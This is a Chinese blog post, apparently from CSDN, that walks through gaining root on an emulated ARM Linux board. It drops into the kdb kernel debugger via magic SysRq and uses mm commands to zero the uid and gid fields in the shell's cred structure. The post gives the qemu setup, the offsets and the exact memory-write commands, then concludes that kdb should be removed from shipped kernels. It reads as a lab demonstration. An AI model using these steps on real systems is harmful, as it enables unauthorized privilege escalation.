linux kdb内核调试器,linux系统通过内核调试器kdb获取root权限

最新推荐文章于 2024-04-04 09:58:39 发布
最新推荐文章于 2024-04-04 09:58:39 发布
阅读量198 收藏
点赞数
文章标签: linux kdb内核调试器

linux系统通过内核调试器kdb获取root权限

linux系统通过内核调试器kdb获取root权限

0x1 原理

??kdb模式下是可以随意修改内存的,一旦在非root账户下被触发进入,可以通过mm命令修改登陆shell的uid为0,从而获取root权限

0x2 非root权限账户自动登录

??inittab中添加

??null::respawn:/sbin/getty -L ttyAMA0 115200 vt100

??/etc/passwd添加

??marquis::500:500:Linux User,,,:/home:/bin/sh

??/etc/group添加

??marquis::500:

0x3 qemu参数

??qemu-system-arm \

????-M vexpress-a9 \

????-kernel ~/src/linux/kernel/vexpress-a9-linux-4.10.9/arch/arm/boot/zImage \

????-dtb ~/src/linux/kernel/vexpress-a9-linux-4.10.9/arch/arm/boot/dts/vexpress-v2p-ca9.dtb \

????-sd ~/src/qemu/image/rootfs.ext4 \

????-nographic -append “root=/dev/mmcblk0 rw rootfstype=ext4 rootwait init=/linuxrc console=ttyAMA0 kgdboc=ttyAMA0,115200”

0x4 qemu中触发kdb

??输入ctrl+a b

??send break 触发magic sysrq

??输入g

??发送magic sysrq g命令进入kgdb

0x5 修改uid

??使用id命令查看当前用户id信息

1109ed2810c25039cae01dcff46b4c56.png

图5-1

??执行命令ps

??kdb中ps命令列出包括shell进程在内的所有进程的struct task_struct结构的虚拟起始地址,下图是shell task_struct的相关信息:

7ed94ee3ebd96b5003249f4159eaf218.png

图5-2

??查看task_struct中real_cred地址

??offsetof宏获取real_cred在task_struct中的偏移量,offsetof定义在stddef.h中

??offsetof(struct task_struct, real_cred) == 0x36c, 这个值并不是固定的,与内核配置有关

??md ADDR of shell task_struct+0x36c

119ead82552dcb92ed291a697aef9a78.png

图5-3

??real_cred中uid gid euid guid是要修改的内容,每个成员都是4字节32bit的形式存在的

清单. cred结构体

struct cred {

atomic_t usage;

#ifdef CONFIG_DEBUG_CREDENTIALS

atomic_t subscribers; /* number of processes subscribed */

void *put_addr;

unsigned magic;

#define CRED_MAGIC 0x43736564

#define CRED_MAGIC_DEAD 0x44656144

#endif

kuid_t uid; /* real UID of the task */

kgid_t gid; /* real GID of the task */

kuid_t suid; /* saved UID of the task */

kgid_t sgid; /* saved GID of the task */

kuid_t euid; /* effective UID of the task */

kgid_t egid; /* effective GID of the task */

kuid_t fsuid; /* UID for VFS ops */

kgid_t fsgid; /* GID for VFS ops */

......

};

??查看 real_cred成员的内容

??md ADDR of real_cred

e86bdf9d7fa6066b3b49660428602251.png

图5-4

??修改uid gid euid egid

??mm ADDR of real_cred+0x4 0

??mm ADDR of real_cred+0x8 0

??mm ADDR of real_cred+0x14 0

??mm ADDR of real_cred+0x18 0

bd67c49802576a15fd427216c0e88b96.png

图5-5

??执行命令go

??这时候shell提示符已经由’$’变成’#’

??执行id命令查看登录shell的uid与gid都是500

c1858f18474bb759861cacdd7759fc02.png

图5-6

0x6 版本信息

??主机系统:ubuntu 14.04

??linux版本号: 4.10.9

??交叉编译工具版本:

??arm-none-linux-gnueabi-gcc (Sourcery CodeBench Lite 2014.05-29) 4.8.3

??qemu版本:QEMU emulator version 2.7.1

??模拟开发板:arm vexpress a9

0x7总结

??kdb是不安全的,任何发行的二进制内核文件,都应该清除kdb

参考资料

??https://www.kernel.org/pub/linux/kernel/people/jwessel/dbg_webinar/State_Of_kernel_debugging_LinuxCon2014.pdf

linux系统通过内核调试器kdb获取root权限相关教程

爱啃馒头的竹子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内核调试器kdb代码分析
04-20
详细的介绍了linux内核开发kdb调试的技术
在vmware中用kdb调试linux内核和模块
alex_mianmian的博客
12-18 1500
在vmware中用kdb调试linux内核和模块
内核调试方法 二
bugouyonggan的专栏
02-19 2094
九  KGDB kgdb提供了一种使用 gdb调试 Linux 内核的机制。使用KGDB可以象调试普通的应用程序那样,在内核中进行设置断点、检查变量值、单步跟踪程序运行等操作。使用KGDB调试时需要两台机器,一台作为开发机(Development Machine),另一台作为目标机(Target Machine),两台机器之间通过串口或者以太网口相连。串口连接线是一根RS-232接口的电缆,
Linux内核调试之如何用kdb调试
最新发布
weixin_44458100的博客
04-04 379
为了更加方便内核调试,社区开发了内核级的调试模块kdb和kgdb,通过它们可以实现对内核的在线调试。1、调试支持:KDB支持多进程、多线程调试,可以在多CPU上进行调试,同时支持几种核心调试技术,包括单步、断点、进程状态检查、运行状态检查、记录系统调用、跟踪系统调用等。
linux】调试工具介绍
墨染锦年的博客
07-25 520
Linux内核调试过程中,可以使用各种工具和技术来诊断和解决问题。以下是一些常用的Linux内核调试方法:printk:printk是Linux内核中的打印函数,可以在代码中插入打印语句来输出调试信息。这些信息将被发送到内核日志缓冲区,可以使用dmesg命令或/var/log/messages文件查看。kdbkdbLinux内核调试器,可以在运行时对内核进行调试。它提供了命令行接口,可以查看和修改内核的状态、寄存器值、堆栈跟踪等信息。
Linux内核调试工具:Kdb应用指南
xulin_2005的专栏
08-20 1066
作者:胡风华   kdb是一个Linux系统内核调试器,它是由SGI公司开发的遵循GPL许可证的开放源码调试工具。kdb嵌入在Linux内核中,为内核程序员提供调试手段。它适合于调试内核空间的程序代码,譬如进行设备驱动程序调试,内核模块的调试等。目前kdb支持包括x86(
Linux内核工程导论——内核调试
生活需要深度
03-08 666
时间:2022-08-28 21:49:24内核也是一个程序,一般的,调试程序常用的方法有3种:打印信息、断点执行和插入探测点。
Linux系统内核调试器--kdb使用白皮书
04-10
kdb是一个Linux系统内核调试器,它是由SGI公司开发的遵循GPL许可证的开放源码调试工具。kdb嵌入在Linux内核中,为内核程序员提供调试手段。它适合于调试内核空间的程序代码,譬如进行设备驱动程序调试,内核模块的...
linux内核驱动详解2
03-24
`-- 内核调试工具 |-- ddd-3.3.11.tar.gz |-- gdbmod-2.4.bz2 |-- kdb-v4.4-2.6.15-rc5-common-1.bz2 |-- kdb-v4.4-2.6.15-rc5-common-2.bz2 |-- kdb-v4.4-2.6.15-rc5-i386-1.bz2 `-- linux-2.6.15.5-kgdb-...
linux内核驱动详解1
03-24
`-- 内核调试工具 |-- ddd-3.3.11.tar.gz |-- gdbmod-2.4.bz2 |-- kdb-v4.4-2.6.15-rc5-common-1.bz2 |-- kdb-v4.4-2.6.15-rc5-common-2.bz2 |-- kdb-v4.4-2.6.15-rc5-i386-1.bz2 `-- linux-2.6.15.5-kgdb-...
精通LINUX设备驱动程序开发
05-24
412 20.10.1 infiniband 413 20.10.2 rapidio 413 20.10.3 光纤通道 413 20.10.4 iscsi 413 第21章 调试设备驱动程序 414 21.1 kdb 414 21.1.1 进入调试器 415 21.1.2 kdb 415 21.1.3 kgdb 417 21.1.4 gdb...
linux kdb,kdb命令_linux虚拟内存的技术博客_51CTO博客
weixin_36165569的博客
05-26 651
dmesg:该命令用于打印内核的相关信息kill:向进程发送信号语法:kill - lsmod:列出了系统中所有的当前系统中可装载模块的信息第一列:模块名第二列:模块的代码量第三列:模块对象的地址第四列:模块的计数第五列: 模块的状态(loading,unloading,live)第六列:模块的初始装载地址第七列:使用该模块的模块env:列出kdb中的所有环境变量。使用set命令修改kdb的环境变...
arm linux内核调试器--kdb
sxw1002的专栏
05-14 1435
1. 介绍kdb是简单主义的shell风格的交互接口,可以借助键盘或者串口在系统终端上使用。你可以用它查看内存,寄存器,进程列表,内核log,甚至设置断点停在某个地方,尽管你可以设置断点并且对内核运行进行简单的控制,但kdb不是源码级的调试器kdb主要的目标时对内核做一些分析用于辅助开发和诊断内核问题。如果内核编译时选择了CONFIG_KALLSYMS,不管时内建的还是模块编译,都可以通过名称访问
linux内核单步调试,linux内核调试之KDB(1)
weixin_39718890的博客
04-29 674
说到linux调试人们第一想到的就是GDB,GDB是GNU开源组织发布的一个强大的UNIX下的程序调试工具,想必大家都比较熟悉,但是在调试模块时缺少一些至关重要的功能,它可用来查看内核的运行情况,包括反汇编内核函数,可是我们一般调试内核问题不会用GDB,因为还有更多更适合调试内核的工具等着我们。KDB:很好的内核调试工具,优点是不需要两台机器进行调试,缺点是只能在汇编代码级进行调试,看不到C源代码...
KDB内核调试方法
qq_44857749的博客
08-24 1922
2.3 内存显示 这一类别中常用的命令是 md、mdr、mm 和 mmW。 注意设备的大小端序 2.4 内存修改 2.5 寄存器显示和修改 这一类别中的命令有 rd、rm 和 ef。注意:不同的处理器都有自己一套独立的寄存器,举例仅供参考 2.6 堆栈跟踪 主要的堆栈跟踪命令有 bt、btp、btc 和 bta。 2.7 反汇编 2.8 其它常用命令 3 技巧和诀窍 3.1 技巧 1 3.2 技巧 2 3.3 技巧 3 3.4 技巧 4 例如,可以
Linux Kernel KDB KGDB 实体机内核调试
Funning的博客
12-19 1139
KDB KGDB Kernel。 非虚拟机内核调试。 注:不设置会报错 -22 Permisson denied。 所有CPU运行任务 KDB> btc。 模块状态 KDB> lsmod。
linux 内核三种调试方法比较(gdb、kdb、kgdb)
热门推荐
ARM-Linux
07-06 1万+
1. kdb:只能在2.6版旧内核使用,需要打上补丁;优点是不需要两台机器进行调试,直接在本机进行操作。Kdb(Kernel Debug)是SGI公司开发的遵循GPL的内建Linux内核调试工具。标准的Linux内核不包括kdb,需要从ftp://oss.sgi.com/www/projects/kdb/download/ix86 下载对应标准版本内核kdb补丁,对标准内核打补丁,然后,编译打过...
System Request 进入KDB模式过程详解
李子的备忘录
09-09 1895
0   echo g > /proc/sysrq-trigger   怎么让系统停下来,进入进入KDB循环? 1   需要简单了解下:Linux Magic System Request 2   在sysrq数组中我并没有发现注册”g”对应调用的函数,可是调试的时候确实生效了   static struct sysrq_key_op *sysrq_key_table[36] = {
linux内核调试工具
06-06
3. KDBLinux内核调试器,可以在运行时对内核进行调试。 4. SystemTap:Linux系统跟踪和探测工具,可以用于调试内核代码。 5. Ftrace:Linux内核跟踪工具,可以用于跟踪内核函数的执行情况。 6. Perf:Linux性能...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值